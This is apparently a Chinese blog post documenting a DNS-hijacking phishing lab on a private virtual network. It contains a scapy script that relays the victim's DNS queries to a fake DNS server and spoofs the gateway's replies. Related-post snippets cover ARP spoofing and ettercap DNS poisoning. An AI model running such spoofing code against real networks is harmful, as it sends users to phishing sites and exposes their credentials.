DNS劫持实验(钓鱼网站)

最新推荐文章于 2024-07-30 18:48:34 发布
最新推荐文章于 2024-07-30 18:48:34 发布
阅读量2.6k 收藏 19
点赞数 4
分类专栏: python windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/n5xxxx__zy/article/details/90705242
版权

实验环境:

搭建一个目标网站www.wh.com

网卡:192.168.146.2

Win7 (被欺骗的)IP:192.168.146.129

Win2008 (假DNS服务器)   IP:192.168.146.130

1、网站搭建

Win2008网卡

 

2、执行py代码

from scapy.all import *

wlan2="VMware Virtual Ethernet Adapter for VMnet8"
dns_server="192.168.146.130"  # win2008已搭好的dns服务器
dnsdst=""
def rev(p):
	global dnsdst
	try:
		pip=p[IP]
		pudp=[UDP]
		pdns=p[DNS]
		if p.dport==53 and pip.dst=="192.168.146.2":# 这个包是win7向网关的请求包 
			dnsdst=pip.src  
			send(IP(src="192.168.146.1",dst=dns_server,ttl=55)/UDP(sport=p[UDP].sport,dport=53)/pdns,iface=wlan2)
			print("转发查询信息成功",dnsdst)
		elif p.sport==53 and pip.src==dns_server:  #这一个包是搭建的DNS给自己回的包
			#print(dnsdst)
			send(IP(src="192.168.146.2",dst="192.168.146.129",ttl=55)/UDP(sport=53,dport=p[UDP].dport)/pdns,iface=wlan2)
			print("转发响应信息成功")
	except :
		pass
print("开始攻击")
sniff(iface=wlan2,filter="udp  port 53",timeout=300,prn=rev)

 

成功劫持

注:

我们用wireshark抓包分析 (vmware8网卡)

1(请求包): win7向真实网关发送解析域名请求

2(请求包): 我们模拟客户端向win2008发送请求包

3(响应包): win2008将搭建的网站IP返回给我们

4(响应包): 我们伪装成真实网关192.168.146.2向win7回应 给它假的IP

5(响应包): 真实网关向win7返回查到的真实IP

 

 

n5xxxx__zy
关注
  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
ARP和DNS欺骗以及网站钓鱼分析
Yo_ol的博客
04-19 3924
实验目的 1、掌握ARP中间人攻击原理 2、掌握DNS欺骗原理 3、熟悉网站钓鱼的原理。 实验环境 VMware15.0、windows客户端、windows server2008、kali linux系统 jd网站站点素材、 ettercap工具 拓扑图: 实验内容 知识背景 钓鱼者运用社会工程学知识诱骗受害者,以在未授权情况下获取对方的姓名、年龄、邮箱账号、甚至银行卡密码等私人信息钓鱼往往和社会工程学相结合进行诱导,而社会工程学是黑客的内功,能否灵活运用可以体现一个黑客的个人..
网络安全 - DNS劫持原理 + 实验
z339521的博客
06-14 2171
DNSDNS(Domain Name System)即域名系统。我们常说的 DNS 是域名解析协议。DNS 协议提供域名到 IP 地址之间的解析服务。计算机既可以被赋予 IP 地址,也可以被赋予主机名和域名。用户通常使用主机名或域名来访问对方的计算机,而不是直接通过 IP 地址访问。因为与 IP 地址的一组纯数字相比,用字母配合数字的表示形式来指定计算机名更符合人类的记忆习惯。但要让计算机去理解名称,相对而言就变得困难了。因为计算机更擅长处理一长串数字。
利用ettercap进行dns挟持-钓鱼网站
qq_44232452的博客
07-20 221
这里如果报错e325 attention这是因为没有正常退出导致的。进行dns指向 A 是正向解析 PRT 是反向解析。mv abc a 把文件abc重命名为a。放弃所有修改,从上次保存文件开始编辑。双击dns选项开始dns投毒,最后显示劫持成功。:w file 将修改另存到file中不退出。开始arp投毒,可以监控到目标主机传输数据。:w 保存文件不退出。3.开启apache服务。5.打开ettercap。2.Linux常用命令。:wq 保存并退出。
网络攻防之ARP欺骗和DNS劫持实验
m0_62574258的博客
02-24 2402
实验环境:攻击主机:kali2023虚拟机,IP地址为192.168.133.141靶机:Windows10虚拟机,IP地址为192.168.133.129网关地址:192.168.133.2(1)ARP协议介绍在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。这个目标主机的MAC地址就是通过地址解析协议ARP获得的。ARP协议中通常有两种数据包:ARP请求包和ARP应答包。
DNS劫持
qq_61142406的博客
02-13 3275
均在本地模拟,请不要用于非法途径 小白学习,如有错误或者建议还请提出 先了解一下dns协议,当然dns也能做隐藏隧道,,,后续写上 DNS协议是用来将域名转换为IP地址(也可以将IP地址转换为相应的域名地址) dns劫持实验环境: Windows10(靶机) 192.168.64.139,kali Linux(攻击机) 192.168.64.133 均为NAT模式,保证在同一个网关,能够通信,可以用ping测试(windows默认ping四次,Linux默认一直ping,可以加一个参数 -c 来指定
ARP欺骗与DNS劫持实验详解
最新发布
weixin_67832625的博客
07-30 371
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击
Windows实验——DNS劫持演练
浅浅的博客
03-08 4225
一、实验环境 钓鱼网站:虚拟机Windows Server 2008的缺省网站 IP:192.168.43.44 攻击者:物理机Win 10 IP:192.168.43.89 被攻击者:物理机Win 7 ...
内网渗透之 arp欺骗-dns劫持-网站钓鱼
orange777
02-26 5231
环境信息 攻击机kali 192.168.10.124 靶机win7 192.168.10.229 arp欺骗 用到ettercap工具 1、启动ettercap -G 2、设置嗅探网卡,如eth0 扫描存活主机 将靶机192.168.10.229添加为目标1,网关192.168.10.1添加为目标2 进行arp欺骗 此时可以在靶机win7上看到kali的mac地址和网关mac地址一致,欺骗成功 dns劫持 1、编辑 Ettercap 的文件vim /etc/ettercap/etter.dn
python实现dns劫持_技术分享 | 劫持DNS通过流量植入木马实验
weixin_40002611的博客
12-15 672
*本文原创作者:R1ngk3y,本文属FreeBuf原创奖励计划,未经许可禁止转载严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。前言很多时候对目标进行渗透时一般会从web、网络设备、针对性钓鱼这三个方向入手。假设我们控制了目标网络中的一台网络设备,如路由器,内网用户流量会从这个地方经过我们怎么获取其权限呢 ?这种时候可以在路由器上抓包分析用户流量,比如启动xshell、notepad++等...
网站发布站dns劫持工具
06-12
网站发布站DNS劫持工具是一种技术手段,通常用于网络安全研究或恶意活动,它涉及网络通信的基础部分——域名系统(DNS)。DNS是互联网上的一个关键组件,它的主要任务是将易于记忆的域名转换为对应的IP地址,使用户...
DNS域名劫持服务器DnsServer-2019.zip
07-27
- 避免访问未经认证的公共Wi-Fi网络,因为这些网络更容易遭受DNS劫持。 - 用户应定期检查自己的网络设备设置,确保未被恶意篡改DNS配置。 综上所述,DNS域名劫持是网络安全的一大威胁,了解其工作原理和防范措施...
DNS路由器劫持网站代码生成器
05-29
然而,由于DNS劫持的潜在危害,此类工具的使用必须谨慎。在没有充分理解其工作原理和可能风险的情况下,随意使用可能会导致个人信息泄露、网络安全问题或其他不可预见的后果。 在提供的压缩包文件中,"DNS路由器...
360 DNS劫持专杀工具官方版.rar
09-02
《360 DNS劫持专杀工具:网络安全的守护者》 在当今互联网时代,网络安全问题日益凸显,其中DNS劫持是一种常见的网络攻击手段。360作为知名的网络安全公司,针对这一威胁推出了“360 DNS劫持专杀工具官方版”,旨在...
解决DNS污染与DNS劫持的软件
02-07
DNS污染和DNS劫持在天朝是非常常见的现象。 输入了一个错误的URL后,本应该出现的404页面却是电信114, 正常访问网站时出现的电信的小广告, 使用了代理却依然无法正常访问某些境外网站, 以及最近爆出来的Gmail...
教你十分钟写一个软件防火墙
n5xxxx__zy的博客
05-30 5579
首先在记事本中写入想禁止的清单 注:只输入程序名,不输入文件后缀 ,一个程序一行 这里以火狐为例 代码如下: $process_name = type "black.txt" #需要关闭的进程 while ($true) { #死循环 $processes = Get-process ...
keyshot7.3 汉化中文版教程 (一看就会装
n5xxxx__zy的博客
06-13 2920
链接:https://pan.baidu.com/s/1TayML-5-e86I5ALQQIN9rA 提取码:6lms Next->install for me ->再选一次安装路径->选一次文件存放路径 -> finsh 如果先运行软件了 可能会破解失败 进入压缩包解压后的文件夹 然后打开你安装的路径 会发现有两个keyshot7 文件夹,...
CMD下sc和net;PowerShell 下的get-service和get-wmiobject
n5xxxx__zy的博客
05-30 2333
1.cmd下的net net用于打开没有被禁用的服务,在电脑输入services.msc可以打开电脑服务,在这可以查看服务状态(图形化界面) 也可以在cmd下net start查看已开启的服务 可以看见也有server命令 停止服务:net stop 服务名,注意服务名有空格要加引号 在cmd下net start查看已启动的Windows服务中无server服务 启...
DNS欺骗劫持与防范策略
05-18
DNS欺骗劫持是一种网络攻击攻击者通过篡改DNS服务器的响应,将用户的请求重定向到恶意网站或者钓鱼网站,从而获取用户的敏感信息或者控制用户的计算机。为了防范DNS欺骗劫持,可以采取以下策略: 1. 使用可靠的...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值